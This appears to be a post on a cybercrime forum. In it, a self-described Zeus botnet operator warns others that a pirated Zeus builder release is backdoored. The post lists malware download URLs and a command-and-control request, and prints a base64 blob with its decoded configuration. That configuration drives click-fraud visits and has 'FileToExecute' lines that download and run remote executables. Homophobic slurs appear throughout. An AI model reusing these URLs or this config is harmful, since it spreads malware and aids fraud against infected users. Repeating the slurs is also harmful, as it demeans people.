People don't use 1.2.7.7 version published here. It's builded *.exe is backdored. That's why all victims die fast. Because there is another Zeus inside and some other *.exe later runs which are visiting websites (maybe google adwords?). I give ~2k bots for this asshole. I think other people "gave" him much more. Admins should ban this gay-asshole.
BX1 go save ur botnet, maybe it will be traced.
Some links for exes & other:
http://zonetech.info/um.1.exe
http://bestphotocard.com/geo/countrybyip.php
http://personals-online.net/947/smail2.exe
http://zonetech.info/Xms.exe
Screens:
http://www.ipix.lt/images/65940144.jpg
http://www.ipix.lt/images/40394057.jpg
I think that's enough proof for baning that gay, asshole bx1.
Other releases could be backdored too, be carefull.
Look here too:
"GET" - >
http://bup.nocry.net/andre.gif
Response:
W0Jyb3dzZUl0U2V0dGluZ3NdDQpSZXN0YXJ0UHJvamVjdD0wDQ pSZXN0YXJ0UHJvamVjdERlbGF5PTIwDQpBbGxvd2VkQ291bnRy aWVzPVVTLCBHQiwgQ0EsIEFULCBCRSwgQkcsIENZLCBDWiwgRE ssIEVFLCBGSSwgRlIsIERFLCBHUiwgSFUsIElFLCBJVCwgTFYs IExULCBMVSwgTVQsIE5MLCBQTCwgUFQsIFJPLCBTSywgU0ksIE VTLCBTRSwgQVUsIFpBLCBHVCwgSFINCkJyb3dzZUl0VXJsVG9W aXNpdD1odHRwOi8vbmV3Lm5vY3J5Lm5ldC9hbmRyZWxpbmsuZ2 lmDQpSZWZlcmVyMj1odHRwOi8vd3d3LnNlYXJjaC1jb3JuZXIu Y29tLw0KUGF1c2U9MTUNClJhbmRvbVBhdXNlPXllcw0KTG9vcH NOdW1iZXI9MTcNClZpc2l0SXBBZGRyZXNzTGlua3NPTkxZPXll cw0KSUdOT1JFPW1haWx0bzosQCxjb250YWN0IHVzLEFib3V0IH VzLFNpZ24gdXAsU2lnbiBpbixTaWduIG91dCxUZXJtcyxGQVEs QWJ1c2UsUHJpdmFjeSxGZWVkYmFjayxsaXZlIHN1cHBvcnQsc3 VwcG9ydCxBZHZlcnRpc2UgaW4gdGhlc2UgcmVzdWx0cw0KSUdO T1JFMT1odHRwOi8vLywuemlwLC5yYXIseWFuZGV4LC5iYXQsLm RsbCwuanMsLmxuaywucGlmLC5zaXMsLmRtZywuc2NyLC5zaHMs LnZicywucHNkLC5ibXANCklHTk9SRTI9LmV4ZSwuZ2lmLC5lcH MsLmxvZywubWlkLC5yYW0sLm1wMywud212LC53bWYsLnBuZywu dHh0LC53YXYsLndtYSwubXJjLFNlbmQgQ29tcGxhaW50LFByaX ZhY3kgUG9saWN5LHJlYWQgbW9yZQ0KSUdOT1JFMz1hYnVzZS5w aHAsYWJ1c2UuaHRtbCxhYnVzZS5odG0sc3VwcG9ydC5waHAsc3 VwcG9ydC5odG1sLHN1cHBvcnQuaHRtLHNpZ251cC5waHAsc2ln bnVwLmh0bWwsc2lnbnVwLmh0bSxsb2dpbi5waHAsbG9naW4uaH RtbCxsb2dpbi5odG0NCklHTk9SRTQ9cHJpdmFjeS5waHAscHJp dmFjeS5odG1sLHByaXZhY3kuaHRtLFNldCBhcyBob21lcGFnZS wgRG93bmxvYWQsVGVybXMgb2Ygc2VydmljZSxQb3dlcmVkIGJ5 IFBlYWtjbGljayx0b29sYmFyLmV4ZSxEb3dubG9hZCBGaW5kLm ZtIHRvb2xiYXINCklHTk9SRTU9amF2YXNjcmlwdDpzYWhwKCdo dHRwOi8vJyksP3JlZj11aV8saWU9VVRGLTgmb2U9LC5jb20vc2 VhcmNoLnBocD9xPSxkb21haW4tcGFya2luZy5waHAsP2xvZ2lu PXByZXhvLEFmZmlsaWF0ZSBQcm9ncmFtLCBBYnVzZSBSZXBvcn QsIFRyeSBHb29nbGUNCklHTk9SRTY9aHR0cHM6Ly93d3cudW1h eGxvZ2luLmNvbSx1bWF4bG9naW4uY29tLGphdmFzY3JpcHQ6aG lzdG9yeS5iYWNrKDEpLGNsaWNrLnBocD8mDQpMdWNreVVSTDJ2 aXNpdD0/YWlkPSw/Yz0sZ28ucGhwLD9pZD0sJnE9LD9xcT0sP3M9DQpWaXNpdElmTm 90SW5MaXN0PXllcw0KUmVzdGFydEFsbFByb2plY3RfT05MWWlm aXBBRERSRVNTX29yX0x1Y2t5VVJMMnZpc2l0X0ZvdW5kPXllcw 0KUmVzdGFydE9uSGFuZz0yMzANCk5ld0V4ZU5hbWU9YXZkMzIN Cg0KW0lFdXBkYXRlU2V0dGluZ3NdDQpSZXN0YXJ0UHJvamVjdD 0yDQpSZXN0YXJ0UHJvamVjdERlbGF5PTExMw0KQWxsb3dlZENv dW50cmllcz1VUywgR0IsIENBLCBBVCwgQkUsIEJHLCBDWSwgQ1 osIERLLCBFRSwgRkksIEZSLCBERSwgR1IsIEhVLCBJRSwgSVQs IExWLCBMVCwgTFUsIE1ULCBOTCwgUEwsIFBULCBSTywgU0ssIF NJLCBFUywgU0UsIEFVLCBaQSwgR1QsIEhSDQpVcmxUb1Zpc2l0 PWh0dHA6Ly82Ni4xNzkuMjM0LjE2OS9jcHYuanNwP3A9MTEzMD g5JmFpZD0xNTQ4JnBhcnRuZXJNaW49MC4wMCZyb249b24mcm9u TWluPTAuMDAmdXJsPSZjb250ZXh0PSZkZWZhdWx0PWh0dHAlM0 ElMkYlMkZ1cmwuYWR0cmd0LmNvbSUyRmRlZmF1bHQuanNwaQ0K VXJsVG9WaXNpdD1odHRwOi8vNjYuMTc5LjIzNC4xNjkvY3B2Lm pzcD9wPTExMzA4OSZhaWQ9MTU0OCZwYXJ0bmVyTWluPTAuMDAm cm9uPW9uJnJvbk1pbj0wLjAwJnVybD0mY29udGV4dD0mZGVmYX VsdD1odHRwJTNBJTJGJTJGdXJsLmFkdHJndC5jb20lMkZkZWZh dWx0LmpzcGkNClVybFRvVmlzaXQ9aHR0cDovLzY5LjcxLjU3Lj kzL2Nwdi5qc3A/cD0xMTMwODkmYWlkPTE1NDgmcGFydG5lck1pbj0wLjAwJnJvbj 1vbiZyb25NaW49MC4wMCZ1cmw9JmNvbnRleHQ9JmRlZmF1bHQ9 aHR0cCUzQSUyRiUyRnVybC5hZHRyZ3QuY29tJTJGZGVmYXVsdC 5qc3BpDQpVcmxUb1Zpc2l0PWh0dHA6Ly9wb3B1bmRlci51cnRi ay5jb20vY3B2LmpzcD9wPTExMzA4OSZhaWQ9MTU0OCZwYXJ0bm VyTWluPTAuMDAmcm9uPW9uJnJvbk1pbj0wLjAwJnVybD0mY29u dGV4dD0mZGVmYXVsdD1odHRwJTNBJTJGJTJGdXJsLmFkdHJndC 5jb20lMkZkZWZhdWx0LmpzcGkNCkJsb2NrUG9wdXBzPVRydWUN ClRpbWVUb0Nsb3NlT25Eb2N1bWVudFN0YXJ0TG9hZGluZz0xNQ 0KRmlsZVRvRXhlY3V0ZT1odHRwOi8vem9uZXRlY2guaW5mby91 bS4xLmV4ZQ0KRmlsZVRvRXhlY3V0ZT1odHRwOi8vem9uZXRlY2 guaW5mby9taWNyby5leGUNCg
Decode by Base64 and u get:
[BrowseItSettings]
RestartProject=0
RestartProjectDelay=20
AllowedCountries=US, GB, CA, AT, BE, BG, CY, CZ, DK, EE, FI, FR, DE, GR, HU, IE, IT, LV, LT, LU, MT, NL, PL, PT, RO, SK, SI, ES, SE, AU, ZA, GT, HR
BrowseItUrlToVisit=http://new.nocry.net/andrelink.gif
Referer2=http://www.search-corner.com/
Pause=15
RandomPause=yes
LoopsNumber=17
VisitIpAddressLinksONLY=yes
IGNORE=mailto:,@,contact us,About us,Sign up,Sign in,Sign out,Terms,FAQ,Abuse,Privacy,Feedback,live support,support,Advertise in these results
IGNORE1=http:///,.zip,.rar,yandex,.bat,.dll,.js,.lnk,.pif,.sis,.dm g,.scr,.shs,.vbs,.psd,.bmp
IGNORE2=.exe,.gif,.eps,.log,.mid,.ram,.mp3,.wmv,.w mf,.png,.txt,.wav,.wma,.mrc,Send Complaint,Privacy Policy,read more
IGNORE3=abuse.php,abuse.html,abuse.htm,support.php ,support.html,support.htm,signup.php,signup.html,s ignup.htm,login.php,login.html,login.htm
IGNORE4=privacy.php,privacy.html,privacy.htm,Set as homepage, Download,Terms of service,Powered by Peakclick,toolbar.exe,Download Find.fm toolbar
IGNORE5=javascript

ahp('http://'),?ref=ui_,ie=UTF-8&oe=,.com/search.php?q=,domain-parking.php,?login=prexo,Affiliate Program, Abuse Report, Try Google
IGNORE6=https://www.umaxlogin.com,umaxlogin.com,javascript
:history .back(1),click.php?&
LuckyURL2visit=?aid=,?c=,go.php,?id=,&q=,?qq=,?s=
VisitIfNotInList=yes
RestartAllProject_ONLYifipADDRESS_or_LuckyURL2visi t_Found=yes
RestartOnHang=230
NewExeName=avd32
[IEupdateSettings]
RestartProject=2
RestartProjectDelay=113
AllowedCountries=US, GB, CA, AT, BE, BG, CY, CZ, DK, EE, FI, FR, DE, GR, HU, IE, IT, LV, LT, LU, MT, NL, PL, PT, RO, SK, SI, ES, SE, AU, ZA, GT, HR
UrlToVisit=http://66.179.234.169/cpv.jsp?p=113089&aid=1548&partnerMin=0.00&ron=on&r onMin=0.00&url=&context=&default=http%3A%2F%2Furl. adtrgt.com%2Fdefault.jspi
UrlToVisit=http://66.179.234.169/cpv.jsp?p=113089&aid=1548&partnerMin=0.00&ron=on&r onMin=0.00&url=&context=&default=http%3A%2F%2Furl. adtrgt.com%2Fdefault.jspi
UrlToVisit=http://69.71.57.93/cpv.jsp?p=113089&aid=1548&partnerMin=0.00&ron=on&r onMin=0.00&url=&context=&default=http%3A%2F%2Furl. adtrgt.com%2Fdefault.jspi
UrlToVisit=http://popunder.urtbk.com/cpv.jsp?p=113089&aid=1548&partnerMin=0.00&ron=on&r onMin=0.00&url=&context=&default=http%3A%2F%2Furl. adtrgt.com%2Fdefault.jspi
BlockPopups=True
TimeToCloseOnDocumentStartLoading=15
FileToExecute=http://zonetech.info/um.1.exe
FileToExecute=http://zonetech.info/micro.exe
:}
ban this gay